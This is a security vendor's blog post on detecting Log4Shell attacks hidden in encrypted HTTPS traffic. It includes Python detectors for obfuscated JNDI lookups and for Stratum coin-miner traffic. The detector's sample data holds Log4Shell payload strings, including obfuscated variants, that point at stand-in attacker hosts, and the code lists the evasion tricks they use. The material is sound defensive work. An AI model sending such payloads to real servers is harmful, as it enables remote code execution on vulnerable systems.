Effective URL: https://www.extrahop.com/company/blog/2021/detect-log4j-encrypted-traffic/?utm_campaign=2022-q1-march-alert-prospects-Spr...
DETECT LOG4J ATTACKS HIDING IN ENCRYPTED TRAFFIC

 * Published by Jeff Costlow on December 17, 2021

ExtraHop threat researchers have observed attackers in the wild using encrypted
traffic to evade detection of Log4Shell attacks. This is consistent with the
broader trend of attackers using encryption as an evasion mechanism during the
initial intrusion and lateral movement stages of an attack, among others.

Encrypted traffic completely hides post-compromise Log4Shell activity from many
security detection and investigation tools. Security practitioners should
examine their tooling to determine whether it has sufficient decryption and
traffic inspection capability to catch encrypted Log4Shell exploits and the
post-compromise behavior that follows, which can include installation of coin
miners, ransomware delivery, and data exfiltration.


HOW ENCRYPTED LOG4SHELL ATTACKS WORK

Log4Shell exploits work by getting a vulnerable application to log a string
that contains a JNDI lookup, of the form
${jndi:ldap://<attacker-controlled host>/a}. Affected versions of Log4j
resolve the lookup, connect to the external LDAP or RMI server it names, and
retrieve a Java class that is then loaded and executed.

[Graphic: the sequence of events in a Log4Shell exploit]

Multiple encrypted protocols can be used in Log4Shell attacks. This example
focuses on the most common: HTTPS. Attack steps at both the initial intrusion
and post-compromise stages of a successful attack can be executed over
unencrypted HTTP or encrypted HTTPS. In these steps the malicious JNDI lookup
can be placed in any request field the target application logs, such as the
User-Agent or Origin header.

These malicious JNDI requests can be detected in plaintext HTTP traffic. If the
traffic is encrypted, however, the malicious requests are hidden from security
analysts and their tools unless they have some way of decrypting it. Reveal(x)
is able to securely decrypt HTTPS traffic, completely out of band, to detect and
investigate these attacks with full access to the malicious JNDI strings.
Security tools without decryption capabilities will not see the exploit string
in an encrypted request; at best they see its side effects, such as the
vulnerable server's outbound LDAP or RMI connection to the attacker's host.

The annotated screenshot below shows a set of HTTP and HTTPS transaction records
observed by ExtraHop Reveal(x). You can see various characteristics of the
requests, including:

 1. Which port the request came over: port 80, the default for unencrypted
    HTTP, and port 443, the default for encrypted HTTPS
 2. The User-Agent header containing malicious JNDI payloads, indicating a
    Log4j exploit attempt
 3. The Origin header, also containing malicious JNDI payloads

It is critical to note that the important information about which devices were
attacked with a Log4Shell exploit, and how they responded, would be completely
hidden in the encrypted traffic on port 443. The reason it is visible in this
screenshot is that Reveal(x) 360 decrypts HTTPS traffic for inspection in a way
that does not violate security or privacy requirements. Without this
capability, threat detection tools that rely on pattern or string matching, and
to some extent even on behavior, would see nothing of interest here. Security
analysts and investigators would be unable to access these details, and the
attacker would be free to continue exploiting.

Identifying information in this screenshot has been redacted.
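As an added example (not code from the original post and not ExtraHop's
detection logic), the following Python detector applies the same idea to a
handful of constructed transaction records. It first normalizes the Log4j
lookup obfuscations attackers use to disguise the word jndi (${lower:j},
${upper:j}, ${::-j}, ${env:X:-j}, ${date:'j'}), then searches every header an
application might log for a JNDI lookup and records the callback scheme and
host. Port 443 sessions the sensor could not decrypt carry no headers at all,
which is exactly the blind spot the screenshot illustrates. The record layout,
IP addresses, and header values are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample records (not real captures). Each mimics one HTTP(S)
# transaction as a network sensor would record it. For port 443 the headers
# are only available when the sensor decrypted the TLS session; a session it
# could not decrypt is recorded with headers=None.
SAMPLE_RECORDS = [
    {"client": "203.0.113.10", "server": "10.0.0.5", "port": 80, "decrypted": True,
     "headers": {"Host": "app.example",
                 "User-Agent": "${jndi:ldap://203.0.113.10:1389/a}"}},
    {"client": "203.0.113.10", "server": "10.0.0.5", "port": 443, "decrypted": False,
     "headers": None},
    {"client": "203.0.113.10", "server": "10.0.0.5", "port": 443, "decrypted": True,
     "headers": {"User-Agent": "Mozilla/5.0",
                 "Origin": "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/x}"}},
    {"client": "198.51.100.7", "server": "10.0.0.5", "port": 443, "decrypted": True,
     "headers": {"User-Agent": "curl/7.79.1",
                 "X-Api-Version": "${${::-j}${env:NOPE:-n}${date:'d'}${upper:i}"
                                  ":rmi://198.51.100.7:1099/obj}"}},
    {"client": "192.0.2.25", "server": "10.0.0.5", "port": 443, "decrypted": True,
     "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
                 "Referer": "https://app.example/?q=${price}"}},
]

# An innermost ${...} lookup: one with no further ${ } nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization: the scheme and the callback host it names.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/{0,2}\s*([^/:}\s]+)", re.I)


@dataclass
class Finding:
    client: str
    server: str
    port: int
    header: str         # which logged request field carried the payload
    scheme: str         # ldap, rmi, dns, ...
    callback_host: str  # attacker-controlled host the victim would connect to
    normalized: str     # the payload with obfuscation removed


def _resolve(expr: str) -> Optional[str]:
    """Evaluate the Log4j lookups attackers use to disguise 'jndi'; None if not one."""
    if ":-" in expr:                       # ${anything:-x} and ${::-x} -> x
        return expr.split(":-", 1)[1]
    if expr.lower().startswith("lower:"):  # ${lower:J} -> j
        return expr[6:].lower()
    if expr.lower().startswith("upper:"):  # ${upper:j} -> J
        return expr[6:].upper()
    m = re.fullmatch(r"date:'([^']*)'", expr)  # ${date:'j'} -> j
    return m.group(1) if m else None


def normalize_lookups(value: str, max_passes: int = 10) -> str:
    """Resolve nested obfuscation lookups inside-out until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)      # leave ${jndi:...} and unknown lookups alone
            changed = True
            return r

        value = _INNER.sub(sub, value)
        if not changed:
            break
    return value


def scan_records(records: List[dict]) -> List[Finding]:
    """Search every header of every inspectable record for a JNDI lookup."""
    findings = []
    for rec in records:
        if rec["headers"] is None:
            continue                      # undecrypted TLS: nothing to inspect
        for name, raw in rec["headers"].items():
            norm = normalize_lookups(raw)
            m = _JNDI.search(norm)
            if m:
                findings.append(Finding(rec["client"], rec["server"], rec["port"],
                                        name, m.group(1).lower(), m.group(2), norm))
    return findings


def blind_spots(records: List[dict]) -> List[dict]:
    """Records the sensor saw but could not inspect (encrypted, not decrypted)."""
    return [r for r in records if r["headers"] is None]


if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f"{f.client} -> {f.server}:{f.port} via {f.header}: {f.scheme}://{f.callback_host}")
    print(f"{len(blind_spots(SAMPLE_RECORDS))} encrypted record(s) could not be inspected")
```

The port number is deliberately not a detection signal here: the same payload
shows up on 80 and 443, and only decryption decides whether the 443 records
have anything to match against. Normalizing before matching matters because a
plain string match on "${jndi:" misses every obfuscated variant in the sample.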


POST-COMPROMISE ACTIVITY FROM LOG4SHELL ATTACKS

As a remote code execution (RCE) vulnerability, Log4Shell can be the starting
point of nearly any type of attack campaign. A few post-compromise activities
observed in the wake of Log4Shell exploits include:

 * Coin miner activity: specifically the installation of XMRig. Reveal(x)
   detects this post-compromise activity by identifying use of the Stratum
   mining protocol, which the miner uses to talk to its pool.
 * Ransomware delivery: As one of the most profitable attacker strategies, it
   was inevitable that ransomware would start to be delivered via Log4Shell.
   Reveal(x) has several mechanisms for detecting and responding to ransomware
   attacks. Reveal(x) ransomware detections are driven by behavioral monitoring
   and work regardless of the delivery mechanism.
 * Lateral movement: Attackers don't stop when they compromise one machine in a
   target environment. They move laterally, using encrypted protocols to affect
   other devices on the network, establish persistence, and expand their reach
   to achieve more impact, whether by exfiltrating data or distributing
   ransomware more widely. Reveal(x) detects lateral movement and
   living-off-the-land tactics, including abuse of Active Directory and remote
   access protocols and tools such as MSRPC and PsExec.
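The coin miner bullet above says the detection signal is the Stratum protocol
rather than the miner binary. As an added example (not ExtraHop's code), the
following Python classifier shows what that looks like on the wire: it parses
the newline-delimited JSON-RPC messages in a reassembled TCP payload and
recognizes both the classic mining.* dialect and the login/job dialect that
XMRig and other CryptoNote miners use, pulling out the miner agent string and
the wallet or worker it logged in with. The flow records, payloads, wallet and
agent strings are constructed placeholders. The first sample flow is a miner on
port 443; XMRig can talk to its pool over TLS, so in practice that payload is
only inspectable after decryption, which is the point of this post.

```python
import json
from dataclasses import dataclass
from typing import Iterator, List, Optional

# Method names of the classic Stratum v1 dialect (client -> pool and pool -> client).
STRATUM_V1 = {"mining.subscribe", "mining.authorize", "mining.submit",
              "mining.notify", "mining.set_difficulty", "mining.set_target"}

# Constructed sample flows (not real captures). Each payload is the reassembled
# client+server byte stream a sensor would see, after TLS decryption where the
# session was encrypted. Wallet and agent values are placeholders.
SAMPLE_FLOWS = [
    {"client": "10.0.0.5", "server": "198.51.100.20", "port": 443, "payload":
        b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4EXAMPLEWALLETNOTREAL",'
        b'"pass":"x","agent":"XMRig/6.16.4","algo":["rx/0"]}}\n'
        b'{"id":1,"jsonrpc":"2.0","result":{"id":"a1","job":{"blob":"0c0c","job_id":"j1",'
        b'"target":"b88d0600"},"status":"OK"}}\n'},
    {"client": "10.0.0.9", "server": "198.51.100.21", "port": 3333, "payload":
        b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.1"]}\n'
        b'{"id":2,"method":"mining.authorize","params":["worker1","x"]}\n'},
    {"client": "10.0.0.7", "server": "10.0.0.5", "port": 80, "payload":
        b"GET /index.html HTTP/1.1\r\nHost: app.example\r\n\r\n"},
    {"client": "10.0.0.8", "server": "10.0.0.30", "port": 8545, "payload":
        b'{"jsonrpc":"2.0","id":1,"method":"login","params":{"user":"bob"}}\n'},
]


@dataclass
class MiningFinding:
    client: str
    server: str
    port: int
    dialect: str            # "stratum-v1" or "stratum-cryptonote"
    agent: Optional[str]    # miner software string, if the handshake carried one
    login: Optional[str]    # wallet address or worker name the miner logged in with


def _jsonrpc_messages(payload: bytes) -> Iterator[dict]:
    """Yield every newline-delimited JSON object in a reassembled TCP payload."""
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line.startswith(b"{"):
            continue          # HTTP, binary, or anything else: not JSON-RPC
        try:
            msg = json.loads(line)
        except ValueError:
            continue
        if isinstance(msg, dict):
            yield msg


def classify_stream(flow: dict) -> Optional[MiningFinding]:
    """Return a finding if the flow's payload is Stratum mining traffic, else None.

    The port is deliberately not a signal: pools listen on 3333, 4444, 443 and
    others, and the sample XMRig flow above is on 443.
    """
    dialect = agent = login = None
    for msg in _jsonrpc_messages(flow["payload"]):
        method, params = msg.get("method"), msg.get("params")
        if method in STRATUM_V1 and isinstance(params, list):
            dialect = "stratum-v1"
            if method == "mining.subscribe" and params:
                agent = params[0]
            elif method == "mining.authorize" and params:
                login = params[0]
        elif isinstance(params, dict):
            # CryptoNote/XMRig dialect: "login" carries wallet and agent, the
            # pool pushes "job" messages, and shares go back as "submit".
            keys = set(params)
            if method == "login" and {"login", "pass"} <= keys:
                dialect = "stratum-cryptonote"
                agent = params.get("agent", agent)
                login = params.get("login", login)
            elif method in ("submit", "keepalived") and "id" in keys:
                dialect = dialect or "stratum-cryptonote"
            elif method == "job" and {"blob", "job_id", "target"} <= keys:
                dialect = dialect or "stratum-cryptonote"
    if dialect is None:
        return None
    return MiningFinding(flow["client"], flow["server"], flow["port"], dialect, agent, login)


def scan_flows(flows: List[dict]) -> List[MiningFinding]:
    """Classify every flow and keep only the ones that look like mining."""
    return [f for f in (classify_stream(flow) for flow in flows) if f is not None]


if __name__ == "__main__":
    for f in scan_flows(SAMPLE_FLOWS):
        print(f"{f.client} -> {f.server}:{f.port} {f.dialect} agent={f.agent} login={f.login}")
```

The generic JSON-RPC "login" call in the last sample flow is not flagged,
because the CryptoNote check requires the login/pass parameter shape a pool
expects; matching on the method name alone would be a ready source of false
positives from ordinary RPC APIs.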


A NOTE ON LOG4J AND SUPPLY CHAIN ATTACKS

It became increasingly clear in 2021 that the software supply chain is a source
of risk that can affect anyone. The SolarWinds SUNBURST attack and the
Kaseya/REvil attacks used the software supply chain to gain unauthorized access
and inflict massive damage on thousands of organizations. Log4Shell is
different in that it exploits a zero-day vulnerability that was not maliciously
introduced by attackers. But Log4j is so ubiquitous that many vendors are
susceptible to it, especially in their development environments and continuous
integration and continuous delivery (CI/CD) pipelines. This widespread exposure
to a zero-day vulnerability makes exploitation likely. Anyone using software
must assume their providers are vulnerable and take measures to secure their
supply chain, in addition to their own network.

Log4j is a widely used component that is present in many systems and pieces of
software worldwide. It is likely that many people and companies vulnerable to
this attack are not yet aware that they are vulnerable. For security
practitioners and vendors alike, it is important to investigate internally and
to check with the vendors and service providers you work with to ensure that
they are taking steps to protect themselves and you.


HOW TO DETECT LOG4SHELL ATTACKS IN ENCRYPTED TRAFFIC

To detect encrypted Log4Shell attacks, you have to be decrypting the right
traffic. The ability to decrypt traffic for inspection is a standard feature of
Reveal(x). Customers have complete control over whether it is enabled and
granular control over which traffic streams to decrypt for inspection. ExtraHop
customers with decryption enabled for HTTPS traffic streams where Log4Shell
attacks are likely to occur will be able to detect and investigate attacks with
the details shown in the above screenshot.

If you're a current customer and want to enable decryption capabilities in
Reveal(x), visit the SSL/TLS decryption page of the ExtraHop documentation
website.

For help identifying which traffic to decrypt to make it easier to detect and
respond to Log4Shell, please reach out to your ExtraHop account contact.

If you're not an ExtraHop customer and want to learn more about strategic
decryption and how it can help detect today's advanced attacks, check out our
white paper Encryption vs. Visibility: Why SecOps Must Decrypt Traffic for
Analysis.

 * Posted in Cybersecurity, Security Alerts, NDR


HUNT THREATS WITH REVEAL(X)

Investigate a live attack in the full product demo of ExtraHop Reveal(x),
network detecion and response for the hybrid enterprise.

Start Demo


RELATED BLOGS

12.10.21


DEFEND AGAINST LOG4J EXPLOITS

Understand Log4j exploitation and what you can do about this zero-day
vulnerability.

Jeff Costlow

9.28.21


DETECT MALWARE IN ENCRYPTED TRAFFIC FOR IMPROVED SECURITY VISIBILITY

Encryption gives attackers dark places to hide. Learn which common solutions for
network visibility fall short, and which can accurately detect advanced threats.

Jesse Munos

10.14.21


DETECTING ATTACKS USING MICROSOFT PROTOCOL DECRYPTION

Microsoft Active Directory is a favorite target for attackers, and traditional
threat detection techniques are falling short. Learn why and what you can do.

Jesse Munos


SIGN UP TO STAY INFORMED

Javascript is required to submit this form


+

ExtraHop uses cookies to improve your online experience. By using this website,
you consent to the use of cookies. Learn More

Global Headquarters
520 Pike St
Suite 1600
Seattle, WA 98101
United States

EMEA Headquarters
WeWork 8
Devonshire Square
London EC2M 4PL
United Kingdom

APAC Headquarters
3 Temasek Avenue
Centennial Tower
Level 18
Singapore 039190

PLATFORM

 * Reveal(x) 360
 * How It Works
 * Competitive Comparison
 * Why Decryption Matters
 * Integrations and Automations
 * Cybersecurity Services
 * Free Shields Up Assessment
 * What is Network Detection & Response (NDR)?
 * Cloud-Native Security Solutions
 * Reveal(x) Enterprise: Self-Managed NDR

SOLUTIONS

 * Security
 * Cloud
 * IT Ops
 * Use Cases
 * Industries

CUSTOMERS

 * Customer Portal Login
 * Services Overview
 * Training Overview
 * Support Overview

PARTNERS

 * Channel Overview
 * Technology Integration Partners
 * Partner Program Information

BLOG

MORE

 * About Us
 * News & Events
 * Careers
 * Resources

 * Copyright ExtraHop Networks 2022
 * Terms of Use
 * Privacy Policy
 * 日本語

 * Facebook
 * Twitter
 * LinkedIn
 * Instagram
 * YouTube


0:30











Close


suggested results